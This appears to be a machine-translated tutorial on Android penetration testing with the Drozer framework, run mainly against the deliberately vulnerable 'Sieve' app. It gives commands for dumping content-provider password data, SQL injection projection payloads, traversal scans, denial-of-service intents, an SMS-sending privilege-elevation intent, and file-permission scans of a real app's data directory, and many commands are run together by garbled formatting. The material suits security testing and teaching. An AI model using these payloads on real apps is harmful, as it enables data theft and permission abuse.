First, install and start 1.installation
First step: Download Drozer from Http://mwr.to/drozer (Windows Installer)
Step Two: install agent.apk on your Android device
ADB install agent.apk
2.Start
First step: use adb on the PC for port forwarding and forwarding to the port used by Drozer 31415
ADB forward TCP:31415 tcp:31415
Step two: Turn on the drozer Agent on your Android device
Select Embedded Server-enable
Step three: Open the drozer console on the PC
Second, the test steps
1. Get the package name
Dz> Run App.package.list-f sievecom.mwr.example.sieve
2. Get basic information about your app
Run App.package.info-a Com.mwr.example.sieve
3. Identify the attack surface
Run App.package.attacksurface Com.mwr.example.sieve
4.Activity
(1) Get activity information
Run App.activity.info-a Com.mwr.example.sieve
(2) Activate activity
Run App.activity.start--component com.mwr.example.sievedz> help App.activity.startusage:run App.activity.start [-h] [--action action] [--Category Category][--component Package component] [--data-URI data _uri][--extra TYPE KEY VALUE] [--Flagsflags [flags ...]] [--mimetype mimetype]
5.Content Provider
(1) get content Provider information
Run App.provider.info-a Com.mwr.example.sieve
(2) Content Providers(data leakage)
Get all the URIs you can access first :
Run Scanner.provider.finduris-a Com.mwr.example.sieve
Get The data for each Uri:
Run App.provider.querycontent://com.mwr.example.sieve.dbcontentprovider/passwords/--vertical
A vulnerability exists in the query to the data description
(3) Content Providers(SQL injection)
Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--projection "'" Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--selection "'"
An error indicates that there is a SQL injection.
List all tables:
Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--projection "* FROM Sqlite_master WHERE type= ' table ';--"
Get The data in a table (such as Key):
Run App.provider.query content://com.mwr.example.sieve.dbcontentprovider/passwords/--projection "* from Key ;--"
(4) Simultaneous detection of SQL injection and directory traversal
Run Scanner.provider.injection-a com.mwr.example.sieverun scanner.provider.traversal-a com.mwr.example.sieve
6 Intent component triggering (denial of service, privilege elevation)
There are two kinds of vulnerabilities in using intent to trigger a component, such as denial of service and privilege elevation of a class. Denial of service is less harmful, and more simply affects the quality of the app's service, and elevation of privilege will enable an app that does not have that permission to trigger an app with that permission through intent, which can help it complete its ultra vires behavior.
1. View the exposed broadcast component information:
Run app.broadcast.info-a com.name gets broadcast receivers information run App.broadcast.send--component package name-- Action Android.intent.action.XXX
2. Attempt to deny service attack detection, send incomplete intent (empty action or empty extras) to broadcast component:
Run App.broadcast.send sends broadcast receiver via intent
(1) Empty action
Run App.broadcast.send--Component Package name Receivernamerun app.broadcast.send--component package name Receivername
(2) Empty extras
Run App.broadcast.send--action Android.intent.action.XXX
3. Try Permission Elevation
Elevation of privilege is very similar to denial of service, except that it becomes a intent that constructs more complete and satisfies the program logic. Because activity is generally more relevant than user interaction, intent-based permissions elevate more for broadcast receiver and service. Drozer-related privilege promotion tool, can refer to the Intentfuzzer, which combines drozer and hook technology, using feedback strategy to fuzzing. The following is just a list of the commands Drozer sends intent:
(1) Get service details
Run App.service.info-a com.mwr.example.sieve do not use Drozer to start Serviceam startservice–n package name/service name
(2) Privilege elevation
Run App.service.start--action com.test.vulnerability.SEND_SMS--extra string dest 11111--extra string text 1111--extra String OP send_sms
7. File operation
List globally writable/readable files in the specified file path
Run Scanner.misc.writablefiles--privileged/data/data/com.sina.weiborun scanner.misc.readablefiles-- privileged/data/data/com.sina.weiborun app.broadcast.send--component package name--action Android.intent.action.XXX
8. Other Modules
Shell.start Open an interactive shelltools.file.upload/tools.file.download upload/ download file to device Tools.setup.busybox/ TOOLS.SETUP.MINIMALSU installing the available binaries
Use Drozer for Android penetration testing